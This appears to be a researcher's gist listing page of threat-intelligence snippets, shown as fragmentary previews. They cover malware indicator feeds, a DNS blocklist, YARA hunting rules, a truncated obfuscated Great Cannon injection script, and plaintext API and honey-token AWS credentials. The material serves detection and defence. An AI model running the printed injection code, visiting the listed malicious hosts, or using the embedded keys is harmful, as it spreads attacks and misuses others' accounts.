import json
import urllib3
import requests
import datetime
import random
import string
import logging
def lambda_handler(event, context):
chrisdoman / TestFeed.csv
Last active Mar 27, 2020
Test Feed for MISP
indicator,indicator_type,pulse_title,pulse_author,tlp
ihracat.myq-see.com,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
phantom101.duckdns.org,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
goodattack.duckdns.org,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
http://www.tempinfo.96.lt/wras/savekey.php,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
http://www.tempinfo.96.lt/wras/createkeys.php,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
http://www.tempinfo.96.lt/wras/RANSOM20.jpg,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
www.tempinfo.96.lt,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326,file,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
[default]
aws_access_key_id = AKIAXYZDQCENYTNALZP5
aws_secret_access_key = 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
output = json
region = us-east-2
* This is just a honey token to detect automated scanners looking for AWS keys - this is not a real AWS account! *
chrisdoman / otx_blocklist.rpz
Created Sep 17, 2019
Sample RPZ blocklist from OTX
differentia.ru CNAME .
*.differentia.ru CNAME .
disorderstatus.ru CNAME .
*.disorderstatus.ru CNAME .
gvaq70s7he.ru CNAME .
*.gvaq70s7he.ru CNAME .
atomictrivia.ru CNAME .
*.atomictrivia.ru CNAME .
4nbizac8.ru CNAME .
# Short demonstration script that writes OTX hostnames to an RPZ-format text file
from OTXv2 import OTXv2
import os
# API key for the demonstration user "api_example". It is committed here in plain text; use your own key and load it from the environment or a secrets store rather than hard-coding it in the script.
otx = OTXv2('766ba1df3ab54db9c0fcbf62ef048c3a04c260e8ca65b6c25346084b7b4719ad')
events = otx.get_all_indicators(author_name='alienvault')
output = ''
// Hunting rule for Great Cannon injection artefacts. It fires as soon as ANY one of the
// listed strings is found; `nocase wide ascii` matches each string case-insensitively
// in both 8-bit and UTF-16 (wide) encodings.
// NOTE(review): several of these strings are short, generic identifiers, so hits on
// unrelated scripts are plausible — treat a match as a lead to triage, not a verdict.
rule hunt_great_cannon {
strings:
// Identifiers and an expression taken from the injected script (see the accompanying samples)
$ = "requesttime_list" nocase wide ascii
$ = "responsetime_list" nocase wide ascii
$ = "cloudflare_js_validate_url" nocase wide ascii
// IP address literal embedded in the samples
$ = "116.255.226.154" nocase wide ascii
$ = "responsetime-requesttime>TIMEGAP" nocase wide ascii
condition:
// a single matching string is sufficient
any of them
}
chrisdoman / cannon_samples.js
Created Sep 2, 2019
Samples from the Great Cannon
var _a="(,& vXh)C;sf<H8O1J|iRY9dj?G%m4}n_M'pQZkFyaEP=Ko2/\\x]!cquSV.57B^lW*Utr{z+N-ADg>[we0b\"I6:TL3",_b="^JL,qMP(*IjReDE<xiQYo{tp>8!-[W&hOcbv12Fn\".%4Ks=5 Z]Cl'uXfAHrdGaN/9}zg\\+U6|kSV:;wmyB7T)_03?",_c="DjOx.}S=Q's_\"I:]c[E(g/JG)k!2yY,zBV4>PFu9rp;N1i<%ZUM*?0K5^nX 8td{LAmH6hbolv&\\a7-ReCq|fw+3TW";eval(function(_,b,a,c,n,r){if(n=function(_){return(_<62?"":n(parseInt(_/62)))+((_%=62)>35?String[_a[11]+_c[40]+_b[20]+_c[66]+_b[51]+_a[6]+_b[62]+_c[40]+_b[51]+_b[20]+_c[62]+_b[12]](_+29):_[_c[61]+_c[71]+_a[56]+_c[61]+_a[68]+_a[19]+_c[57]+_b[68]](36))},0==_a[81][_a[68]+_b[12]+_b[23]+_b[52]+_b[62]+_a[53]+_c[80]](0,n)){for(;a--;)r[n(a)]=c[a];c=[function(_){return r[_]||_}],n=function(){return _c[17]+_c[27]+_b[27]+_a[22]+_a[82]+_b[33]+_c[80]+_a[73]+_a[10]+_a[55]+_c[78]+_a[70]+_a[74]+_c[78]+_a[37]+_c[15]},a=1}for(;a--;)c[a]&&(_=_[_c[40]+_a[80]+_b[23]+_b[52]+_b[62]+_a[53]+_b[12]](new RegExp(_a[49]+_a[82]+n(a)+(_b[69]+_a[82]),_a[76]),c[a]));return _}(_c[27]+_c[59]+_b[84]+_c[65]+_b[75]+_a[45]+_b[9]+_c[0]+_a[44]+_a[89]+_b[88]
'''
Gets possible Great Cannon injections from UrlScan
'''
import requests
import json
# Insert your urlscan API key here (prefer reading it from an environment variable so it is not committed to source control)
api_key = ''
chrisdoman / malware.rules
Created Oct 1, 2018
Autogenerated Rules
/*
YARA rules to identify malware families, made by Yabin
Auto-generated - many of these rules will not work in practice, because they rely on matching byte patterns from compiled code
*/
rule BackdoorAndroidOSCoca_51dc097980b46d053085ff079b153f107d866a27dc19670b79928ec55ab336d7 {
strings:
chrisdoman / Reports.csv
Last active Aug 13, 2020
Example APT Reports Pulled from OTX
title,reference,created
Continued PassCV Malware,https://drive.google.com/file/d/1pzZT7Stig6i8hTqjxUUgxDSmGEJ7W9ak/view,2018-08-06
Blackgear Cyberespionage Campaign Resurfaces Abuses Social Media for C and C Communication,https://blog.trendmicro.com/trendlabs-security-intelligence/blackgear-cyberespionage-campaign-resurfaces-abuses-social-media-for-cc-communication/,2018-07-18
Golden Rat long-term espionage campaign in Syria is still ongoing,http://csecybsec.com/download/zlab/20180723_CSE_APT27_Syria_v1.pdf,2018-07-23
Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally,https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html,2018-07-11
Certificates stolen from Taiwanese tech-companies misused in Plead malware campaign,https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/,2018-07-09
NavRAT Uses US-North Korea Summit As Decoy